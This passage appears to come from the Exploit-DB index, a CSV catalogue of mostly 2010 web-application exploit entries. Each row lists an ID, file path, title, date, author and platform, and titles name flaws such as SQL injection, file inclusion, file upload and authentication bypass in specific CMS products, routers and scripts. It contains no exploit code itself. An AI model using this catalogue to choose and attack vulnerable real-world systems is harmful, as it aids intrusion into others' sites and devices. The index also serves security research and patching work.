Bridge SA",webapps,php, +15327,exploits/php/webapps/15327.txt,"Energine CMS - SQL Injection",2010-10-27,"High-Tech Bridge SA",webapps,php, +15328,exploits/php/webapps/15328.txt,"BloofoxCMS Registration Plugin - SQL Injection",2010-10-27,"High-Tech Bridge SA",webapps,php, +15329,exploits/php/webapps/15329.txt,"Zomplog 3.9 - Cross-Site Request Forgery",2010-10-27,"High-Tech Bridge SA",webapps,php, +15330,exploits/php/webapps/15330.txt,"NinkoBB 1.3RC5 - Cross-Site Scripting",2010-10-27,"High-Tech Bridge SA",webapps,php, +15331,exploits/php/webapps/15331.txt,"Zomplog 3.9 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2010-10-27,"High-Tech Bridge SA",webapps,php, +15332,exploits/php/webapps/15332.txt,"BlogBird Platform - Multiple Cross-Site Scripting Vulnerabilities",2010-10-27,"High-Tech Bridge SA",webapps,php, +15335,exploits/php/webapps/15335.txt,"Alstrasoft e-Friends 4.96 - Multiple Vulnerabilities",2010-10-27,"Salvatore Fresta",webapps,php, +15338,exploits/php/webapps/15338.txt,"ACC IMoveis 4.0 - SQL Injection",2010-10-27,EraGoN,webapps,php, +15340,exploits/php/webapps/15340.txt,"mycart 2.0 - Multiple Vulnerabilities",2010-10-27,"Salvatore Fresta",webapps,php, +15343,exploits/php/webapps/15343.php,"RoSPORA 1.5.0 - Remote PHP Code Injection",2010-10-28,EgiX,webapps,php, +15345,exploits/php/webapps/15345.txt,"TFTgallery 0.13.1 - Local File Inclusion",2010-10-28,Havok,webapps,php, +15348,exploits/php/webapps/15348.txt,"Pub-Me CMS - Blind SQL Injection",2010-10-28,H4f,webapps,php, +15350,exploits/php/webapps/15350.rb,"PHPKit 1.6.1 R2 - 'overview.php' SQL Injection",2010-10-29,"Easy Laster",webapps,php, +15351,exploits/php/webapps/15351.rb,"mygamingladder MGL Combo System 7.5 - 'game.php' SQL Injection",2010-10-29,"Easy Laster",webapps,php, +15353,exploits/php/webapps/15353.txt,"Joomla! Component com_jfuploader < 2.12 - Arbitrary File Upload",2010-10-30,Setr0nix,webapps,php, +15354,exploits/php/webapps/15354.txt,"Zoopeer 0.1/0.2 - 'FCKeditor' Arbitrary File Upload",2010-10-30,Net.Edit0r,webapps,php, +15355,exploits/php/webapps/15355.txt,"Simpli Easy (AFC Simple) NewsLetter 4.2 - Cross-Site Scripting / Information Leakage",2010-10-30,p0deje,webapps,php, +15360,exploits/php/webapps/15360.pl,"MetInfo 2.0 - PHP Code Injection",2010-10-31,Beach,webapps,php, +15361,exploits/php/webapps/15361.pl,"MetInfo 3.0 - PHP Code Injection",2010-10-31,Beach,webapps,php, +15366,exploits/php/webapps/15366.txt,"Joomla! Component Pulse Infotech Flip Wall - SQL Injection",2010-10-31,FL0RiX,webapps,php, +15367,exploits/php/webapps/15367.txt,"Joomla! Component Sponsor Wall 1.1 - SQL Injection",2010-10-31,FL0RiX,webapps,php, +15369,exploits/php/webapps/15369.php,"Auto CMS 1.8 - Remote Code Execution",2010-10-31,"Giuseppe D'Inverno",webapps,php, +15370,exploits/php/webapps/15370.txt,"XAMPP 1.7.3 - Multiple Vulnerabilities",2010-11-01,TheLeader,webapps,php, +15381,exploits/php/webapps/15381.txt,"Collabtive 0.65 - SQL Injection",2010-11-01,"Anatolia Security",webapps,php, +15382,exploits/asp/webapps/15382.txt,"douran portal 3.9.7.55 - Multiple Vulnerabilities",2010-11-01,ITSecTeam,webapps,asp, +15385,exploits/php/webapps/15385.txt,"Kandidat CMS 1.4.2 - Persistent Cross-Site Scripting",2010-11-02,"High-Tech Bridge SA",webapps,php, +15386,exploits/php/webapps/15386.txt,"MemHT Portal 4.0.1 - Persistent Cross-Site Scripting",2010-11-02,"High-Tech Bridge SA",webapps,php, +15387,exploits/php/webapps/15387.txt,"Webmedia Explorer 6.13.1 - Persistent Cross-Site Scripting",2010-11-02,"High-Tech Bridge SA",webapps,php, +15389,exploits/php/webapps/15389.php,"MetInfo 3.0 - 'FCKeditor' Arbitrary File Upload",2010-11-02,[sh3n],webapps,php, +15391,exploits/php/webapps/15391.txt,"Azaronline Design - SQL Injection",2010-11-02,XroGuE,webapps,php, +15395,exploits/asp/webapps/15395.txt,"Site2Ntite Vacation Rental (VRBO) Listings - SQL Injection",2010-11-02,"L0rd CrusAd3r",webapps,asp, +15396,exploits/asp/webapps/15396.txt,"Comrie Software Pay Roll Time Sheet & Punch Card - Authentication Bypass",2010-11-02,"L0rd CrusAd3r",webapps,asp, +15397,exploits/asp/webapps/15397.txt,"Online Work Order System (OWOS) Professional Edition - Authentication Bypass",2010-11-02,"L0rd CrusAd3r",webapps,asp, +15398,exploits/asp/webapps/15398.txt,"Digger Solutions NewsLetter Open Source - SQL Injection",2010-11-02,"L0rd CrusAd3r",webapps,asp, +15399,exploits/asp/webapps/15399.txt,"Site2Nite Business eListings - SQL Injection",2010-11-02,"L0rd CrusAd3r",webapps,asp, +15400,exploits/php/webapps/15400.txt,"Dolphin 7.0.3 - Multiple Vulnerabilities",2010-11-02,anT!-Tr0J4n,webapps,php, +15917,exploits/php/webapps/15917.txt,"Ignition 1.3 - 'comment.php' Local File Inclusion",2011-01-06,n0n0x,webapps,php, +40388,exploits/php/webapps/40388.html,"AnoBBS 1.0.1 - Remote File Inclusion",2016-09-16,bd0rk,webapps,php,80 +15404,exploits/php/webapps/15404.txt,"eLouai's Force Download Script - Arbitrary Local File Download",2010-11-03,v1R00Z,webapps,php, +15405,exploits/php/webapps/15405.txt,"digiSHOP 2.0.2 - SQL Injection",2010-11-03,Silic0n,webapps,php, +15409,exploits/php/webapps/15409.txt,"Zen Cart 1.3.9h - Local File Inclusion",2010-11-03,"Salvatore Fresta",webapps,php, +15412,exploits/php/webapps/15412.txt,"eoCMS 0.9.04 - Multiple Vulnerabilities",2010-11-04,"High-Tech Bridge SA",webapps,php, +15413,exploits/php/webapps/15413.txt,"SweetRice 0.6.7 - Multiple Vulnerabilities",2010-11-04,"High-Tech Bridge SA",webapps,php, +15414,exploits/php/webapps/15414.txt,"JAF CMS 4.0 rc2 - Multiple Vulnerabilities",2010-11-04,"High-Tech Bridge SA",webapps,php, +15415,exploits/php/webapps/15415.txt,"MiniBB 2.5 - SQL Injection",2010-11-04,"High-Tech Bridge SA",webapps,php, +15416,exploits/php/webapps/15416.txt,"JBI CMS - SQL Injection",2010-11-04,Cru3l.b0y,webapps,php, +15430,exploits/php/webapps/15430.txt,"Joomla! Component ccInvoices - SQL Injection",2010-11-05,FL0RiX,webapps,php, +15439,exploits/php/webapps/15439.txt,"Joomla! Component com_connect - Local File Inclusion",2010-11-06,"Th3 RDX",webapps,php, +15440,exploits/php/webapps/15440.txt,"Joomla! Component com_dcnews - Local File Inclusion",2010-11-06,"Th3 RDX",webapps,php, +15441,exploits/php/webapps/15441.txt,"MassMirror Uploader - Remote File Inclusion",2010-11-06,ViciOuS,webapps,php, +15447,exploits/php/webapps/15447.txt,"phpCow 2.1 - File Inclusion",2010-11-06,ViRuS_HiMa,webapps,php, +15448,exploits/asp/webapps/15448.txt,"ASPilot Pilot Cart 7.3 - Multiple Vulnerabilities",2010-11-07,Ariko-Security,webapps,asp, +15451,exploits/php/webapps/15451.pl,"DeluxeBB 1.3 - Private Information Disclosure",2010-11-07,"Vis Intelligendi",webapps,php, +15452,exploits/php/webapps/15452.txt,"Punbb 1.3.4 - Multiple Full Path Disclosures",2010-11-07,SYSTEM_OVERIDE,webapps,php, +15453,exploits/php/webapps/15453.txt,"Joomla! Component Cookex Agency CKForms - Local File Inclusion",2010-11-08,ALTBTA,webapps,php, +15454,exploits/php/webapps/15454.txt,"Joomla! Component com_clan - SQL Injection",2010-11-08,AtT4CKxT3rR0r1ST,webapps,php, +15455,exploits/php/webapps/15455.txt,"xt:Commerce Shopsoftware 3/4 - 'FCKeditor' Arbitrary File Upload",2010-11-08,Net.Edit0r,webapps,php, +15456,exploits/php/webapps/15456.txt,"Joomla! Component com_clanlist - SQL Injection",2010-11-08,CoBRa_21,webapps,php, +15496,exploits/php/webapps/15496.txt,"Metinfo 3.0 - Multiple Vulnerabilities",2010-11-12,anT!-Tr0J4n,webapps,php, +15459,exploits/php/webapps/15459.txt,"Seo Panel 2.1.0 - Critical File Disclosure",2010-11-08,MaXe,webapps,php, +15460,exploits/php/webapps/15460.txt,"Joomla! Component ProDesk 1.5 - Local File Inclusion",2010-11-08,d3v1l,webapps,php, +15466,exploits/php/webapps/15466.txt,"Joomla! Component JQuarks4s 1.0.0 - Blind SQL Injection",2010-11-09,"Salvatore Fresta",webapps,php, +15465,exploits/php/webapps/15465.rb,"Woltlab Burning Board Userlocator 2.5 - SQL Injection",2010-11-09,"Easy Laster",webapps,php, +15468,exploits/php/webapps/15468.txt,"Joomla! Component btg_oglas - HTML / Cross-Site Scripting Injection",2010-11-09,CoBRa_21,webapps,php, +15469,exploits/php/webapps/15469.txt,"Joomla! Component com_markt - SQL Injection",2010-11-09,CoBRa_21,webapps,php, +15470,exploits/php/webapps/15470.txt,"Joomla! Component com_img - Local File Inclusion",2010-11-09,CoBRa_21,webapps,php, +15484,exploits/php/webapps/15484.txt,"FCKEditor Core 2.x 2.4.3 - 'FileManager upload.php' Arbitrary File Upload",2010-11-10,grabz,webapps,php, +15472,exploits/php/webapps/15472.txt,"osCommerce 2.2 - Cross-Site Request Forgery",2010-11-09,daandeveloper33,webapps,php, +15473,exploits/multiple/webapps/15473.html,"IBM OmniFind - Cross-Site Request Forgery",2010-11-09,"Fatih Kilic",webapps,multiple, +15490,exploits/php/webapps/15490.txt,"XT:Commerce < 3.04 SP2.1 - Cross-Site Scripting",2010-11-11,"Philipp Niedziela",webapps,php, +15486,exploits/php/webapps/15486.txt,"eBlog 1.7 - Multiple SQL Injections",2010-11-10,"Salvatore Fresta",webapps,php, +15488,exploits/php/webapps/15488.txt,"Landesk - OS command Injection",2010-11-11,"Aureliano Calvo",webapps,php, +15492,exploits/php/webapps/15492.php,"E-Xoopport 3.1 - 'display.php?katid' SQL Injection",2010-11-11,"Vis Intelligendi",webapps,php, +15497,exploits/asp/webapps/15497.txt,"ASPilot Pilot Cart 7.3 - 'newsroom.asp' SQL Injection",2010-11-12,Daikin,webapps,asp, +15500,exploits/php/webapps/15500.txt,"Woltlab Burning Board 2.3.4 - File Disclosure",2010-11-12,sfx,webapps,php, +15501,exploits/php/webapps/15501.txt,"Joomla! Component JSupport 1.5.6 - Cross-Site Scripting",2010-11-12,Valentin,webapps,php, +15502,exploits/php/webapps/15502.txt,"Joomla! Component JSupport 1.5.6 - SQL Injection",2010-11-12,Valentin,webapps,php, +15506,exploits/hardware/webapps/15506.txt,"Camtron CMNC-200 IP Camera - Authentication Bypass",2010-11-13,"Trustwave's SpiderLabs",webapps,hardware, +15507,exploits/hardware/webapps/15507.txt,"Camtron CMNC-200 IP Camera - Undocumented Default Accounts",2010-11-13,"Trustwave's SpiderLabs",webapps,hardware, +15509,exploits/php/webapps/15509.txt,"Build a Niche Store 3.0 - 'BANS' Authentication Bypass",2010-11-13,"ThunDEr HeaD",webapps,php, +15510,exploits/php/webapps/15510.txt,"AWCM 2.1 Final - Remote File Inclusion",2010-11-13,LoSt.HaCkEr,webapps,php, +15512,exploits/php/webapps/15512.py,"DBSite - SQL Injection",2010-11-13,God_Of_Pain,webapps,php, +15513,exploits/php/webapps/15513.txt,"WordPress Plugin Event Registration 5.32 - SQL Injection",2010-11-13,k3m4n9i,webapps,php, +15515,exploits/php/webapps/15515.txt,"Invision Power Board 3 - 'search_app' SQL Injection",2010-11-13,"Lord Tittis3000",webapps,php, +15516,exploits/php/webapps/15516.txt,"EasyJobPortal - Arbitrary File Upload",2010-11-13,MeGo,webapps,php, +15517,exploits/php/webapps/15517.txt,"Webmatic - 'index.php' SQL Injection",2010-11-13,v3n0m,webapps,php, +15518,exploits/php/webapps/15518.txt,"Joomla! Component CCBoard 1.2-RC - Multiple Vulnerabilities",2010-11-13,jdc,webapps,php, +15519,exploits/php/webapps/15519.txt,"OneOrZero AIms 2.6.0 Members Edition - Multiple Vulnerabilities",2010-11-13,Valentin,webapps,php, +15524,exploits/php/webapps/15524.txt,"Pre ADS Portal - Authentication Bypass",2010-11-13,Cru3l.b0y,webapps,php, +15531,exploits/php/webapps/15531.txt,"BSI Advance Hotel Booking System 1.0 - SQL Injection",2010-11-14,v3n0m,webapps,php, +15526,exploits/php/webapps/15526.txt,"Pre Online Tests Generator Pro - SQL Injection",2010-11-13,Cru3l.b0y,webapps,php, +15550,exploits/php/webapps/15550.txt,"vBulletin 4.0.8 - Persistent Cross-Site Scripting via Profile Customization",2010-11-16,MaXe,webapps,php, +15551,exploits/asp/webapps/15551.txt,"BPAffiliate Affiliate Tracking - Authentication Bypass",2010-11-16,v3n0m,webapps,asp, +15552,exploits/asp/webapps/15552.txt,"BPDirectory Business Directory - Authentication Bypass",2010-11-16,v3n0m,webapps,asp, +15543,exploits/php/webapps/15543.txt,"Chameleon Social Networking Software - Persistent Cross-Site Scripting",2010-11-15,Dr-mosta,webapps,php, +15544,exploits/asp/webapps/15544.txt,"Web Wiz NewsPad Express Edition 1.03 - Database File Disclosure",2010-11-15,keracker,webapps,asp, +15545,exploits/php/webapps/15545.txt,"Nuked-klaN Module Boutique - Blind SQL Injection",2010-11-15,[AR51]Kevinos,webapps,php, +15549,exploits/php/webapps/15549.txt,"Joomla! Component com_alfurqan15x - SQL Injection",2010-11-15,kaMtiEz,webapps,php, +15553,exploits/asp/webapps/15553.txt,"BPConferenceReporting Web Reporting - Authentication Bypass",2010-11-16,v3n0m,webapps,asp, +15554,exploits/asp/webapps/15554.txt,"BPRealestate Real Estate - Authentication Bypass",2010-11-16,v3n0m,webapps,asp, +15555,exploits/php/webapps/15555.txt,"Joomla! Component com_maianmedia - SQL Injection",2010-11-16,v3n0m,webapps,php, +15557,exploits/php/webapps/15557.txt,"openEngine 2.0 100226 - Local File Inclusion / Cross-Site Scripting",2010-11-16,"SecPod Research",webapps,php, +15559,exploits/php/webapps/15559.txt,"IceBB 1.0-rc10 - Multiple Vulnerabilities",2010-11-16,"High-Tech Bridge SA",webapps,php, +15560,exploits/php/webapps/15560.txt,"ClanSphere 2010.0 Final - Multiple Vulnerabilities",2010-11-16,"High-Tech Bridge SA",webapps,php, +15561,exploits/php/webapps/15561.txt,"CompactCMS 1.4.1 - SQL Injection",2010-11-16,"High-Tech Bridge SA",webapps,php, +15563,exploits/asp/webapps/15563.txt,"Sitefinity CMS - 'ASP.NET' Arbitrary File Upload",2010-11-17,Net.Edit0r,webapps,asp, +15564,exploits/php/webapps/15564.txt,"Front Accounting 2.3RC2 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2010-11-17,"Juan Manuel Garcia",webapps,php, +15565,exploits/php/webapps/15565.txt,"Front Accounting 2.3RC2 - Multiple SQL Injections",2010-11-17,"Juan Manuel Garcia",webapps,php, +15567,exploits/php/webapps/15567.txt,"WebRCSdiff 0.9 - 'viewver.php' Remote File Inclusion",2010-11-18,FL0RiX,webapps,php, +15568,exploits/php/webapps/15568.py,"chCounter 3.1.3 - SQL Injection",2010-11-18,"Matias Fontanini",webapps,php, +15570,exploits/php/webapps/15570.php,"Joomla! Component com_mtree 2.1.6 - Overwrite Cross-Site Request Forgery",2010-11-18,jdc,webapps,php, +15571,exploits/php/webapps/15571.txt,"Fozzcom Shopping < 7.94 / < 8.04 - Multiple Vulnerabilities",2010-11-18,"Dr.0rYX & Cr3W-DZ",webapps,php, +15572,exploits/php/webapps/15572.txt,"ViArt Shop 4.0.5 - Multiple Vulnerabilities",2010-11-19,Ariko-Security,webapps,php, +15573,exploits/php/webapps/15573.html,"PHPGallery 1.1.0 - Cross-Site Request Forgery",2010-11-19,Or4nG.M4N,webapps,php, +15574,exploits/php/webapps/15574.txt,"Arabian YouTube Script - Blind SQL Injection",2010-11-19,R3d-D3V!L,webapps,php, +15577,exploits/php/webapps/15577.html,"Plogger Gallery 1.0 - Cross-Site Request Forgery (Change Admin Password)",2010-11-19,Or4nG.M4N,webapps,php, +15578,exploits/php/webapps/15578.txt,"DVD Rental Software - SQL Injection",2010-11-19,JaMbA,webapps,php, +15585,exploits/php/webapps/15585.txt,"Joomla! Component Jimtawl 1.0.2 - Local File Inclusion",2010-11-20,Mask_magicianz,webapps,php, +16087,exploits/php/webapps/16087.txt,"PMB Services 3.4.3 - SQL Injection",2011-02-01,Luchador,webapps,php, +15588,exploits/php/webapps/15588.txt,"S_CMS 2.5 - Multiple Vulnerabilities",2010-11-20,LordTittiS,webapps,php, +15590,exploits/php/webapps/15590.txt,"vBulletin 4.0.8 PL1 - Cross-Site Scripting Filter Bypass within Profile Customization",2010-11-20,MaXe,webapps,php, +15614,exploits/php/webapps/15614.html,"Wolf CMS 0.6.0b - Multiple Vulnerabilities",2010-11-25,"High-Tech Bridge SA",webapps,php, +15611,exploits/multiple/webapps/15611.txt,"JDownloader Webinterface - Source Code Disclosure",2010-11-25,Sil3nt_Dre4m,webapps,multiple, +15612,exploits/php/webapps/15612.txt,"SiteEngine 7.1 - SQL Injection",2010-11-25,Beach,webapps,php, +15615,exploits/php/webapps/15615.html,"Frog CMS 0.9.5 - Multiple Vulnerabilities",2010-11-25,"High-Tech Bridge SA",webapps,php, +15621,exploits/php/webapps/15621.txt,"Jurpopage 0.2.0 - SQL Injection",2010-11-27,Sudden_death,webapps,php, +15623,exploits/php/webapps/15623.pl,"MemHT Portal 4.0.1 - 'User Agent' Persistent Cross-Site Scripting",2010-11-27,ZonTa,webapps,php, +15625,exploits/cgi/webapps/15625.txt,"Skeletonz CMS - Persistent Cross-Site Scripting",2010-11-28,Jbyte,webapps,cgi, +15627,exploits/asp/webapps/15627.html,"Site2Nite Big Truck Broker - 'txtSiteId' SQL Injection",2010-11-28,underground-stockholm.com,webapps,asp, +15629,exploits/asp/webapps/15629.txt,"MicroNetSoft RV Dealer Website - 'search.asp' / showAlllistings.asp' SQL Injection",2010-11-29,underground-stockholm.com,webapps,asp, +15633,exploits/php/webapps/15633.html,"Diferior 8.03 - Multiple Cross-Site Scripting Vulnerabilities",2010-11-29,"High-Tech Bridge SA",webapps,php, +15636,exploits/php/webapps/15636.txt,"Orbis CMS 1.0.2 - Arbitrary File Upload",2010-11-30,"Mark Stanislav",webapps,php, +15637,exploits/php/webapps/15637.txt,"Link Protect 1.2 - Persistent Cross-Site Scripting",2010-11-30,"Shichemt Alen",webapps,php, +15638,exploits/php/webapps/15638.txt,"Duhok Forum 1.1 - Arbitrary File Upload",2010-11-30,BrOx-Dz,webapps,php, +15639,exploits/php/webapps/15639.txt,"Pandora FMS 3.1 - Authentication Bypass",2010-11-30,"Juan Galiana Lara",webapps,php, +15640,exploits/php/webapps/15640.txt,"Pandora Fms 3.1 - OS Command Injection",2010-11-30,"Juan Galiana Lara",webapps,php, +15641,exploits/php/webapps/15641.txt,"Pandora Fms 3.1 - SQL Injection",2010-11-30,"Juan Galiana Lara",webapps,php, +15642,exploits/php/webapps/15642.txt,"Pandora Fms 3.1 - Blind SQL Injection",2010-11-30,"Juan Galiana Lara",webapps,php, +15643,exploits/php/webapps/15643.txt,"Pandora Fms 3.1 - Directory Traversal / Local File Inclusion",2010-11-30,"Juan Galiana Lara",webapps,php, +15644,exploits/php/webapps/15644.txt,"Eclime 1.1.2b - Multiple Vulnerabilities",2010-11-30,"High-Tech Bridge SA",webapps,php, +15645,exploits/php/webapps/15645.txt,"enano CMS 1.1.7pl1 - Multiple Vulnerabilities",2010-11-30,"High-Tech Bridge SA",webapps,php, +15646,exploits/php/webapps/15646.txt,"DynPG 4.2.0 - Multiple Vulnerabilities",2010-11-30,"High-Tech Bridge SA",webapps,php, +15647,exploits/php/webapps/15647.txt,"Elxis CMS 2009.2 - SQL Injection",2010-11-30,"High-Tech Bridge SA",webapps,php, +15650,exploits/php/webapps/15650.txt,"Alibaba Clone B2B 3.4 - SQL Injection",2010-12-01,"Dr.0rYX & Cr3W-DZ",webapps,php, +15651,exploits/php/webapps/15651.txt,"OsCSS 1.2 - Arbitrary File Upload",2010-12-01,"Shichemt Alen",webapps,php, +15653,exploits/asp/webapps/15653.txt,"BugTracker.NET 3.4.4 - Multiple Vulnerabilities",2010-12-01,"Core Security",webapps,asp, +15654,exploits/php/webapps/15654.txt,"Digitalus 1.10.0 Alpha2 - Arbitrary File Upload",2010-12-01,eidelweiss,webapps,php, +15656,exploits/php/webapps/15656.txt,"LittlePhpGallery 1.0.2 - Local File Inclusion",2010-12-01,"kire bozorge khavarmian",webapps,php, +15659,exploits/php/webapps/15659.txt,"Contenido CMS 4.8.12 - Cross-Site Scripting",2010-12-02,"High-Tech Bridge SA",webapps,php, +15660,exploits/php/webapps/15660.txt,"etomite 1.1 - Multiple Vulnerabilities",2010-12-02,"High-Tech Bridge SA",webapps,php, +15661,exploits/asp/webapps/15661.txt,"Ananda Real Estate 3.4 - 'list.asp' Multiple SQL Injections",2010-12-02,underground-stockholm.com,webapps,asp, +15665,exploits/asp/webapps/15665.txt,"Easy Travel Portal 2 - 'travelbycountry.asp' SQL Injection",2010-12-03,"Ulrik Persson",webapps,asp, +15666,exploits/hardware/webapps/15666.txt,"D-Link Routers - Authentication Bypass (1)",2010-12-03,"Craig Heffner",webapps,hardware, +15673,exploits/asp/webapps/15673.txt,"Dejcom Market CMS - 'showbrand.aspx' SQL Injection",2010-12-04,Mormoroth,webapps,asp, +15675,exploits/hardware/webapps/15675.txt,"Linksys Routers - Cross-Site Request Forgery",2010-12-04,"Martin Barbella",webapps,hardware, +15677,exploits/asp/webapps/15677.txt,"T-Dreams Cars Ads Package 2.0 - SQL Injection",2010-12-04,R4dc0re,webapps,asp, +15678,exploits/asp/webapps/15678.txt,"T-Dreams Job Seekers Package 3.0 - SQL Injection",2010-12-04,R4dc0re,webapps,asp, +15679,exploits/asp/webapps/15679.txt,"ASPSiteWare Recipe ORGanizer - SQL Injection",2010-12-04,R4dc0re,webapps,asp, +15680,exploits/asp/webapps/15680.txt,"ASPSiteWare Project Reporter - SQL Injection",2010-12-04,R4dc0re,webapps,asp, +15681,exploits/asp/webapps/15681.txt,"ASPSiteWare JobPost 1.0 - SQL Injection",2010-12-04,R4dc0re,webapps,asp, +15682,exploits/asp/webapps/15682.txt,"ASPSiteWare ASP Gallery 1.0 - SQL Injection",2010-12-04,R4dc0re,webapps,asp, +15683,exploits/asp/webapps/15683.txt,"ASPSiteWare Contact Directory 1.0 - SQL Injection",2010-12-04,R4dc0re,webapps,asp, +15684,exploits/php/webapps/15684.txt,"WordPress 3.0.1 - 'do_trackbacks()' SQL Injection",2010-12-05,M4g,webapps,php, +15685,exploits/php/webapps/15685.html,"PHPKF Forum 1.80 - 'profil_degistir.php' Cross-Site Request Forgery",2010-12-05,FreWaL,webapps,php, +15686,exploits/asp/webapps/15686.txt,"Gatesoft Docusafe 4.1.0 - SQL Injection",2010-12-05,R4dc0re,webapps,asp, +15687,exploits/asp/webapps/15687.txt,"Ecommercemax Solutions Digital Goods Seller - SQL Injection",2010-12-05,R4dc0re,webapps,asp, +15688,exploits/asp/webapps/15688.txt,"HotWebScripts HotWeb Rentals - 'resorts.asp' SQL Injection",2010-12-05,R4dc0re,webapps,asp, +15690,exploits/asp/webapps/15690.txt,"SOOP Portal 2.0 - Arbitrary File Upload",2010-12-05,Net.Edit0r,webapps,asp, +15691,exploits/php/webapps/15691.txt,"Pulse CMS Basic - Local File Inclusion",2010-12-05,"Mark Stanislav",webapps,php, +15699,exploits/php/webapps/15699.txt,"phpMyAdmin - Client-Side Code Injection / Redirect Link Falsification",2010-12-06,"emgent white_sheep & scox",webapps,php,80 +33671,exploits/php/webapps/33671.txt,"MySmartBB 1.7 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-24,indoushka,webapps,php, +15701,exploits/php/webapps/15701.txt,"MODx REvolution CMS 2.0.4-pl2 - POST injection Cross-Site Scripting",2010-12-06,LiquidWorm,webapps,php, +15703,exploits/asp/webapps/15703.txt,"SOOP Portal Raven 1.0b - Arbitrary File Upload",2010-12-07,"Sun Army",webapps,asp, +15744,exploits/cgi/webapps/15744.txt,"Gitweb 1.7.3.3 - Cross-Site Scripting",2010-12-15,emgent,webapps,cgi,80 +15710,exploits/multiple/webapps/15710.txt,"Apache Archiva 1.0 < 1.3.1 - Cross-Site Request Forgery",2010-12-09,"Anatolia Security",webapps,multiple, +15711,exploits/php/webapps/15711.pl,"Abtp Portal Project 0.1.0 - Local File Inclusion",2010-12-09,Br0ly,webapps,php, +15714,exploits/php/webapps/15714.txt,"Joomla! Component JE Auto 1.0 - SQL Injection",2010-12-09,"Salvatore Fresta",webapps,php, +15715,exploits/php/webapps/15715.txt,"CMScout 2.09 - Cross-Site Request Forgery",2010-12-09,"High-Tech Bridge SA",webapps,php, +15720,exploits/php/webapps/15720.txt,"Sulata iSoft - 'stream.php' Local File Disclosure",2010-12-10,Sudden_death,webapps,php, +15718,exploits/php/webapps/15718.txt,"AJ Matrix DNA - SQL Injection",2010-12-09,Br0ly,webapps,php, +15719,exploits/php/webapps/15719.txt,"Joomla! Component JE Messenger 1.0 - Arbitrary File Upload",2010-12-09,"Salvatore Fresta",webapps,php, +15721,exploits/php/webapps/15721.txt,"Joomla! Component com_billyportfolio 1.1.2 - Blind SQL Injection",2010-12-10,jdc,webapps,php, +15728,exploits/hardware/webapps/15728.txt,"Clear iSpot/Clearspot 2.0.0.0 - Cross-Site Request Forgery",2010-12-12,"Trustwave's SpiderLabs",webapps,hardware, +15735,exploits/php/webapps/15735.txt,"MantisBT 1.2.3 (db_type) - Cross-Site Scripting / Full Path Disclosure",2010-12-15,LiquidWorm,webapps,php, +15736,exploits/php/webapps/15736.txt,"MantisBT 1.2.3 (db_type) - Local File Inclusion",2010-12-15,LiquidWorm,webapps,php, +15737,exploits/cgi/webapps/15737.txt,"Google Urchin 5.7.03 - Local File Inclusion",2010-12-15,"Kristian Erik Hermansen",webapps,cgi, +15740,exploits/php/webapps/15740.txt,"Pointter PHP Content Management System - Unauthorized Privilege Escalation",2010-12-15,"Mark Stanislav",webapps,php, +15741,exploits/php/webapps/15741.txt,"Pointter PHP Micro-Blogging Social Network - Unauthorized Privilege Escalation",2010-12-15,"Mark Stanislav",webapps,php, +15742,exploits/php/webapps/15742.txt,"BEdita 3.0.1.2550 - Multiple Vulnerabilities",2010-12-15,"High-Tech Bridge SA",webapps,php, +15743,exploits/php/webapps/15743.txt,"Blog:CMS 4.2.1e - Multiple Vulnerabilities",2010-12-15,"High-Tech Bridge SA",webapps,php, +15748,exploits/php/webapps/15748.txt,"QualDev eCommerce script - SQL Injection",2010-12-16,ErrNick,webapps,php, +15749,exploits/php/webapps/15749.txt,"Joomla! Component JRadio - Local File Inclusion",2010-12-16,Sid3^effects,webapps,php, +15752,exploits/php/webapps/15752.txt,"Softbiz PHP Joke Site Software - Multiple SQL Injections",2010-12-17,v3n0m,webapps,php, +15753,exploits/hardware/webapps/15753.html,"D-Link DIR-300 - Cross-Site Request Forgery (Change Admin Account Settings)",2010-12-17,outlaw.dll,webapps,hardware, +15754,exploits/php/webapps/15754.txt,"Immo Makler Script - SQL Injection",2010-12-17,"Easy Laster",webapps,php, +15755,exploits/php/webapps/15755.txt,"Easy Online Shop - SQL Injection",2010-12-17,"Easy Laster",webapps,php, +15756,exploits/php/webapps/15756.txt,"MHP Downloadshop - SQL Injection",2010-12-17,"Easy Laster",webapps,php, +15766,exploits/php/webapps/15766.txt,"Radius Manager 3.8.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-17,"Rodrigo Rubira Branco",webapps,php, +15765,exploits/php/webapps/15765.txt,"CubeCart 3.x - Arbitrary File Upload",2010-12-17,StunTMaN!,webapps,php, +15768,exploits/php/webapps/15768.txt,"MCFileManager Plugin for TinyMCE 3.2.2.3 - Arbitrary File Upload",2010-12-18,"Vladimir Vorontsov",webapps,php, +15769,exploits/php/webapps/15769.txt,"Ero Auktion 2010 - 'item.php' SQL Injection",2010-12-18,"DeadLy DeMon",webapps,php, +15770,exploits/php/webapps/15770.txt,"Download Center 2.2 - SQL Injection",2010-12-18,"DeadLy DeMon",webapps,php, +15771,exploits/php/webapps/15771.txt,"SchuldnerBeratung - SQL Injection",2010-12-18,"DeadLy DeMon",webapps,php, +15772,exploits/php/webapps/15772.txt,"PayPal Shop Digital - SQL Injection",2010-12-18,"DeadLy DeMon",webapps,php, +15773,exploits/php/webapps/15773.txt,"Projekt Shop - 'details.php' Multiple SQL Injections",2010-12-18,"DeadLy DeMon",webapps,php, +15775,exploits/php/webapps/15775.txt,"Mafia Game Script - SQL Injection",2010-12-18,"DeadLy DeMon",webapps,php, +15776,exploits/asp/webapps/15776.pl,"Virtual Store Open 3.0 - Acess SQL Injection",2010-12-18,Br0ly,webapps,asp, +15777,exploits/asp/webapps/15777.txt,"Oto Galery 1.0 - Multiple SQL Injections",2010-12-19,"DeadLy DeMon",webapps,asp, +15779,exploits/php/webapps/15779.txt,"Joomla! Component JE Auto - Local File Inclusion",2010-12-19,Sid3^effects,webapps,php, +15781,exploits/php/webapps/15781.txt,"Inout Webmail Script - Persistent Cross-Site Scripting",2010-12-20,Sid3^effects,webapps,php, +15783,exploits/php/webapps/15783.txt,"PHP-Nuke MaticMarket 2.02 - Local File Inclusion",2010-12-20,xer0x,webapps,php, +15784,exploits/asp/webapps/15784.txt,"Elcom CommunityManager.NET - Authentication Bypass",2010-12-20,"Sense of Security",webapps,asp, +15789,exploits/php/webapps/15789.txt,"plx Ad Trader 3.2 - Authentication Bypass",2010-12-20,R4dc0re,webapps,php, +15790,exploits/php/webapps/15790.txt,"PHP Web Scripts Ad Manager Pro 3.0 - SQL Injection",2010-12-20,R4dc0re,webapps,php, 